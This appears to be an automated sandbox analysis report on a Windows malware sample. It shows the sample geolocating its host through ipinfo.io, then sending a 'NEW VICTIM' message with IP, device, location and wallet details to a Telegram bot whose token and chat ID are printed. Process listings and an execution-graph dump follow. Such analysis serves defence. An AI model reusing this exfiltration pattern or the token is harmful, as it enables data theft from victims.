                                                                                                                                                                        4192.168.2.94974034.117.59.814437456C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:51 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                        User-Agent: IPInfoFetcher
                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2024-12-12 15:53:52 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                        Content-Length: 321
                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                        date: Thu, 12 Dec 2024 15:53:52 GMT
                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close
                                                                                                                                                                        2024-12-12 15:53:52 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.94974734.117.59.814437540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:54 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                        User-Agent: IPInfoFetcher
                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2024-12-12 15:53:54 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                        Content-Length: 321
                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                        date: Thu, 12 Dec 2024 15:53:54 GMT
                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                        Connection: close
                                                                                                                                                                        2024-12-12 15:53:54 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.949746149.154.167.2204437456C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:54 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                        User-Agent: TelegramBot
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2024-12-12 15:53:54 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:53:54 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 776
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                        2024-12-12 15:53:54 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3314,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.949749149.154.167.2204437540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-12 15:53:56 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                        User-Agent: TelegramBot
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2024-12-12 15:53:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:53:56 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 776
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                        2024-12-12 15:53:56 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3316,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:10:53:38
                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                        Imagebase:0x7ff7abc00000
                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                        MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:10:53:39
                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Imagebase:0x7ff7abc00000
                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                        MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:10:53:49
                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                        Imagebase:0x7ff6a22f0000
                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:10:53:52
                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                        Imagebase:0x7ff6a22f0000
                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:10:54:01
                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                        Imagebase:0x7ff6a22f0000
                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:10:54:09
                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                        Imagebase:0x7ff6a22f0000
                                                                                                                                                                        File size:251'392 bytes
                                                                                                                                                                        MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:12.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:49.6%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:39
                                                                                                                                                                          execution_graph 41319 7ff7abc5c06c 41320 7ff7abc5c09c 41319->41320 41327 7ff7abc5bea0 41320->41327 41323 7ff7abc5c0db 41325 7ff7abc5c0f0 41323->41325 41339 7ff7abc489b4 47 API calls 2 library calls 41323->41339 41328 7ff7abc5bec9 41327->41328 41329 7ff7abc5bef7 41327->41329 41328->41323 41338 7ff7abc489b4 47 API calls 2 library calls 41328->41338 41330 7ff7abc5bf10 41329->41330 41331 7ff7abc5bf67 41329->41331 41341 7ff7abc4cc44 47 API calls 2 library calls 41330->41341 41340 7ff7abc5c5d4 EnterCriticalSection 41331->41340 41338->41323 41339->41325 41341->41328 41342 7ff7abc38ca9 41343 7ff7abc38cb1 41342->41343 41344 7ff7abc38cc6 41342->41344 41343->41344 41346 7ff7abc374c0 41343->41346 41347 7ff7abc374f4 41346->41347 41349 7ff7abc37562 41346->41349 41366 7ff7abc4dc28 41347->41366 41387 7ff7abc32d00 41349->41387 41352 7ff7abc37505 memcpy_s 41373 7ff7abc42770 41352->41373 41353 7ff7abc37546 41382 7ff7abc1f4a0 41353->41382 41357 7ff7abc37577 41392 7ff7abc32c50 50 API calls 41357->41392 41361 7ff7abc37598 41393 7ff7abc37870 50 API calls 3 library calls 41361->41393 41363 7ff7abc375a1 41394 7ff7abc375f0 47 API calls 2 library calls 41363->41394 41365 7ff7abc375c4 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 41365->41344 41371 7ff7abc5a168 memcpy_s 41366->41371 41367 7ff7abc5a1b3 41398 7ff7abc51674 11 API calls memcpy_s 41367->41398 41368 7ff7abc5a19a HeapAlloc 41370 7ff7abc374fd 41368->41370 41368->41371 41370->41352 41370->41353 41371->41367 41371->41368 41395 7ff7abc5324c 41371->41395 41374 7ff7abc42779 41373->41374 41375 7ff7abc3752e 41374->41375 41376 7ff7abc427cc IsProcessorFeaturePresent 41374->41376 41375->41344 41377 7ff7abc427e4 41376->41377 41405 7ff7abc429c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41377->41405 41379 7ff7abc427f7 41406 7ff7abc42798 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41379->41406 41383 7ff7abc1f4c0 41382->41383 41383->41383 41407 7ff7abc244a0 41383->41407 41385 7ff7abc1f4ce 41386 7ff7abc37770 50 API calls 3 library calls 41385->41386 41386->41349 41446 7ff7abc21370 41387->41446 41392->41361 41393->41363 41394->41365 41399 7ff7abc5328c 41395->41399 41398->41370 41404 7ff7abc51f64 EnterCriticalSection 41399->41404 41405->41379 41411 7ff7abc244c6 41407->41411 41419 7ff7abc24594 41407->41419 41409 7ff7abc244cc memcpy_s 41409->41385 41411->41409 41413 7ff7abc244fc 41411->41413 41414 7ff7abc24555 41411->41414 41420 7ff7abc2458e 41413->41420 41421 7ff7abc42a38 41413->41421 41415 7ff7abc42a38 std::_Facet_Register 50 API calls 41414->41415 41415->41409 41437 7ff7abc02410 50 API calls std::_Throw_Cpp_error 41419->41437 41436 7ff7abc02370 50 API calls 3 library calls 41420->41436 41423 7ff7abc42a43 41421->41423 41422 7ff7abc4dc28 __std_exception_copy 12 API calls 41422->41423 41423->41422 41424 7ff7abc24512 41423->41424 41425 7ff7abc5324c std::_Facet_Register 2 API calls 41423->41425 41426 7ff7abc42a62 41423->41426 41424->41409 41431 7ff7abc4cd30 41424->41431 41425->41423 41427 7ff7abc42a6d 41426->41427 41438 7ff7abc3eea4 RtlPcToFileHeader RaiseException _com_raise_error Concurrency::cancel_current_task 41426->41438 41439 7ff7abc02370 50 API calls 3 library calls 41427->41439 41430 7ff7abc42a73 41440 7ff7abc4cba8 47 API calls 2 library calls 41431->41440 41433 7ff7abc4cd49 41441 7ff7abc4cd60 IsProcessorFeaturePresent 41433->41441 41436->41419 41439->41430 41440->41433 41442 7ff7abc4cd73 41441->41442 41445 7ff7abc4ca44 14 API calls 3 library calls 41442->41445 41444 7ff7abc4cd8e GetCurrentProcess TerminateProcess 41445->41444 41447 7ff7abc42a38 std::_Facet_Register 50 API calls 41446->41447 41448 7ff7abc213cc 41447->41448 41462 7ff7abc3f0cc 41448->41462 41450 7ff7abc21456 41452 7ff7abc21463 41450->41452 41473 7ff7abc40a64 7 API calls 2 library calls 41450->41473 41451 7ff7abc213dc 41451->41450 41454 7ff7abc2147e 41451->41454 41457 7ff7abc21080 41452->41457 41474 7ff7abc449c0 RtlPcToFileHeader RaiseException 41454->41474 41456 7ff7abc214cf 41458 7ff7abc42a38 std::_Facet_Register 50 API calls 41457->41458 41459 7ff7abc210f7 41458->41459 41460 7ff7abc3f0cc 58 API calls 41459->41460 41461 7ff7abc21107 41460->41461 41461->41357 41475 7ff7abc3eae4 41462->41475 41464 7ff7abc3f0ee 41472 7ff7abc3f150 memcpy_s 41464->41472 41483 7ff7abc3f2c4 50 API calls std::_Facet_Register 41464->41483 41466 7ff7abc3f106 41484 7ff7abc3f2f4 48 API calls std::locale::_Setgloballocale 41466->41484 41469 7ff7abc3f1a6 41469->41451 41470 7ff7abc3f111 __std_exception_destroy 41471 7ff7abc4dc28 __std_exception_copy 12 API calls 41470->41471 41470->41472 41471->41472 41479 7ff7abc3eb5c 41472->41479 41473->41452 41474->41456 41476 7ff7abc3eaf8 41475->41476 41477 7ff7abc3eaf3 41475->41477 41476->41464 41485 7ff7abc51fd4 6 API calls std::_Locinfo::_Locinfo_ctor 41477->41485 41480 7ff7abc3eb67 LeaveCriticalSection 41479->41480 41481 7ff7abc3eb70 41479->41481 41481->41469 41483->41466 41484->41470 41486 7ff7abc43098 41509 7ff7abc42b80 41486->41509 41489 7ff7abc431e4 41531 7ff7abc436ec 7 API calls 2 library calls 41489->41531 41490 7ff7abc430b4 __scrt_acquire_startup_lock 41492 7ff7abc431ee 41490->41492 41498 7ff7abc430d2 __scrt_release_startup_lock 41490->41498 41532 7ff7abc436ec 7 API calls 2 library calls 41492->41532 41494 7ff7abc430f7 41495 7ff7abc431f9 __std_fs_directory_iterator_open 41496 7ff7abc4317d 41515 7ff7abc43834 41496->41515 41498->41494 41498->41496 41528 7ff7abc48800 47 API calls __GSHandlerCheck_EH 41498->41528 41499 7ff7abc43182 41518 7ff7abc542e8 41499->41518 41506 7ff7abc431a5 41506->41495 41530 7ff7abc42d04 7 API calls 41506->41530 41508 7ff7abc431bc 41508->41494 41510 7ff7abc42b88 41509->41510 41511 7ff7abc42b94 __scrt_dllmain_crt_thread_attach 41510->41511 41512 7ff7abc42ba1 41511->41512 41514 7ff7abc42b9d 41511->41514 41512->41514 41533 7ff7abc44cd0 7 API calls 2 library calls 41512->41533 41514->41489 41514->41490 41534 7ff7abc699f0 41515->41534 41517 7ff7abc4384b GetStartupInfoW 41517->41499 41536 7ff7abc61504 41518->41536 41520 7ff7abc542f7 41522 7ff7abc4318a 41520->41522 41542 7ff7abc61840 47 API calls TranslateName 41520->41542 41523 7ff7abc1c760 41522->41523 41545 7ff7abc183f0 41523->41545 41526 7ff7abc42770 codecvt 8 API calls 41527 7ff7abc1c788 41526->41527 41529 7ff7abc43878 GetModuleHandleW 41527->41529 41528->41496 41529->41506 41530->41508 41531->41492 41532->41495 41533->41514 41535 7ff7abc699e0 41534->41535 41535->41517 41535->41535 41537 7ff7abc61556 41536->41537 41538 7ff7abc61511 41536->41538 41537->41520 41543 7ff7abc57058 52 API calls 3 library calls 41538->41543 41540 7ff7abc61540 41544 7ff7abc611dc 67 API calls 3 library calls 41540->41544 41542->41520 41543->41540 41544->41537 41546 7ff7abc1841a std::_Locinfo::_Locinfo_ctor 41545->41546 42248 7ff7abc1f040 41546->42248 41555 7ff7abc21fe0 10 API calls 41556 7ff7abc184b6 41555->41556 42293 7ff7abc222a0 41556->42293 41559 7ff7abc18517 41564 7ff7abc1f4a0 50 API calls 41559->41564 41560 7ff7abc184e5 41561 7ff7abc1f4a0 50 API calls 41560->41561 41562 7ff7abc184f8 41561->41562 41563 7ff7abc05d00 47 API calls 41562->41563 41565 7ff7abc18500 41563->41565 41566 7ff7abc18536 41564->41566 41567 7ff7abc04550 47 API calls 41565->41567 41568 7ff7abc1f4a0 50 API calls 41566->41568 42245 7ff7abc1850d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 41567->42245 41569 7ff7abc1854a 41568->41569 41570 7ff7abc1f4a0 50 API calls 41569->41570 41572 7ff7abc1855e 41570->41572 41571 7ff7abc42770 codecvt 8 API calls 41574 7ff7abc1c2cb 41571->41574 42301 7ff7abc1eed0 41572->42301 41574->41526 41576 7ff7abc1f4a0 50 API calls 41577 7ff7abc185b1 41576->41577 41578 7ff7abc1eed0 50 API calls 41577->41578 41579 7ff7abc185f0 41578->41579 42311 7ff7abc1ece0 41579->42311 41582 7ff7abc1f4a0 50 API calls 41583 7ff7abc18659 41582->41583 41584 7ff7abc1f4a0 50 API calls 41583->41584 41585 7ff7abc18674 41584->41585 41586 7ff7abc1f4a0 50 API calls 41585->41586 41587 7ff7abc18688 41586->41587 41588 7ff7abc1eed0 50 API calls 41587->41588 41589 7ff7abc186c7 41588->41589 41590 7ff7abc1f4a0 50 API calls 41589->41590 41591 7ff7abc186d8 41590->41591 41592 7ff7abc1eed0 50 API calls 41591->41592 41593 7ff7abc18711 41592->41593 41594 7ff7abc1ece0 50 API calls 41593->41594 41595 7ff7abc1874a 41594->41595 41596 7ff7abc1f4a0 50 API calls 41595->41596 41597 7ff7abc1875e 41596->41597 41598 7ff7abc1f4a0 50 API calls 41597->41598 41599 7ff7abc18783 41598->41599 41600 7ff7abc1ece0 50 API calls 41599->41600 41601 7ff7abc18790 41600->41601 41602 7ff7abc1ece0 50 API calls 41601->41602 41603 7ff7abc1879d 41602->41603 41604 7ff7abc1f4a0 50 API calls 41603->41604 41605 7ff7abc187e8 41604->41605 42314 7ff7abc22960 41605->42314 41608 7ff7abc1f4a0 50 API calls 41609 7ff7abc18817 41608->41609 41610 7ff7abc1f4a0 50 API calls 41609->41610 41611 7ff7abc1882b 41610->41611 41612 7ff7abc1f4a0 50 API calls 41611->41612 41613 7ff7abc1883f 41612->41613 41614 7ff7abc1eed0 50 API calls 41613->41614 41615 7ff7abc1887e 41614->41615 41616 7ff7abc1f4a0 50 API calls 41615->41616 41617 7ff7abc1888f 41616->41617 41618 7ff7abc1eed0 50 API calls 41617->41618 41619 7ff7abc188c8 41618->41619 41620 7ff7abc1ece0 50 API calls 41619->41620 41621 7ff7abc188f2 41620->41621 41622 7ff7abc1f4a0 50 API calls 41621->41622 41623 7ff7abc18931 41622->41623 41624 7ff7abc1f4a0 50 API calls 41623->41624 41625 7ff7abc1894c 41624->41625 41626 7ff7abc1f4a0 50 API calls 41625->41626 41627 7ff7abc18960 41626->41627 41628 7ff7abc1eed0 50 API calls 41627->41628 41629 7ff7abc1899f 41628->41629 41630 7ff7abc1f4a0 50 API calls 41629->41630 41631 7ff7abc189b0 41630->41631 41632 7ff7abc1eed0 50 API calls 41631->41632 41633 7ff7abc189e9 41632->41633 41634 7ff7abc1ece0 50 API calls 41633->41634 41635 7ff7abc18a22 41634->41635 41636 7ff7abc1f4a0 50 API calls 41635->41636 41637 7ff7abc18a36 41636->41637 41638 7ff7abc1f4a0 50 API calls 41637->41638 41639 7ff7abc18a5b 41638->41639 41640 7ff7abc1ece0 50 API calls 41639->41640 41641 7ff7abc18a68 41640->41641 41642 7ff7abc1ece0 50 API calls 41641->41642 41643 7ff7abc18a75 41642->41643 41644 7ff7abc1f4a0 50 API calls 41643->41644 41645 7ff7abc18ac0 41644->41645 41646 7ff7abc22960 50 API calls 41645->41646 41647 7ff7abc18adb 41646->41647 41648 7ff7abc1f4a0 50 API calls 41647->41648 41649 7ff7abc18aef 41648->41649 41650 7ff7abc1f4a0 50 API calls 41649->41650 41651 7ff7abc18b03 41650->41651 41652 7ff7abc1f4a0 50 API calls 41651->41652 41653 7ff7abc18b17 41652->41653 41654 7ff7abc1eed0 50 API calls 41653->41654 41655 7ff7abc18b56 41654->41655 41656 7ff7abc1f4a0 50 API calls 41655->41656 41657 7ff7abc18b67 41656->41657 41658 7ff7abc1eed0 50 API calls 41657->41658 41659 7ff7abc18ba0 41658->41659 41660 7ff7abc1ece0 50 API calls 41659->41660 41661 7ff7abc18bca 41660->41661 41662 7ff7abc1f4a0 50 API calls 41661->41662 41663 7ff7abc18c09 41662->41663 41664 7ff7abc1f4a0 50 API calls 41663->41664 41665 7ff7abc18c24 41664->41665 41666 7ff7abc1f4a0 50 API calls 41665->41666 41667 7ff7abc18c38 41666->41667 41668 7ff7abc1eed0 50 API calls 41667->41668 41669 7ff7abc18c77 41668->41669 41670 7ff7abc1f4a0 50 API calls 41669->41670 41671 7ff7abc18c8b 41670->41671 41672 7ff7abc1eed0 50 API calls 41671->41672 41673 7ff7abc18cca 41672->41673 41674 7ff7abc1ece0 50 API calls 41673->41674 41675 7ff7abc18d03 41674->41675 41676 7ff7abc1f4a0 50 API calls 41675->41676 41677 7ff7abc18d17 41676->41677 41678 7ff7abc1f4a0 50 API calls 41677->41678 41679 7ff7abc18d3c 41678->41679 41680 7ff7abc1ece0 50 API calls 41679->41680 41681 7ff7abc18d49 41680->41681 41682 7ff7abc1ece0 50 API calls 41681->41682 41683 7ff7abc18d56 41682->41683 41684 7ff7abc1f4a0 50 API calls 41683->41684 41685 7ff7abc18da1 41684->41685 41686 7ff7abc22960 50 API calls 41685->41686 41687 7ff7abc18dbc 